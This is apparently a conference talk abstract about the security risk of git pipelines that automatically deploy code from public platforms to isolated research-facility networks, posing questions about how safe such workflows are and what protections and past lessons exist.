Speaker
Description
Many distributed version control platforms utilizing open-source worldwide collaboration, such as GitLab and GitHub, have built-in mechanisms allowing for robust version-control and smooth automation via e.g. pipelines. At some large-scale research facilities, some also trigger automatic deployments of the latest version of the software to clients otherwise isolated on private networks – creating an undesired interface between the public realm and the systems on the private networks. The risk is hence non-zero that a malicious attack could occur to a git repository which introduces malware or functionality changes, with a successful such automatically deploying the malicious changes to the clients defined in its pipeline.
Therefore, there is a need in the field to start discussing and doing risk assessments for scenarios built on this as a baseline, starting with a simple set of questions:
- How safe are these type of git workflows?
- What protection measures could be taken?
- Has this or similar happened before, and if so, in what scale and what lessons learned has come from this?
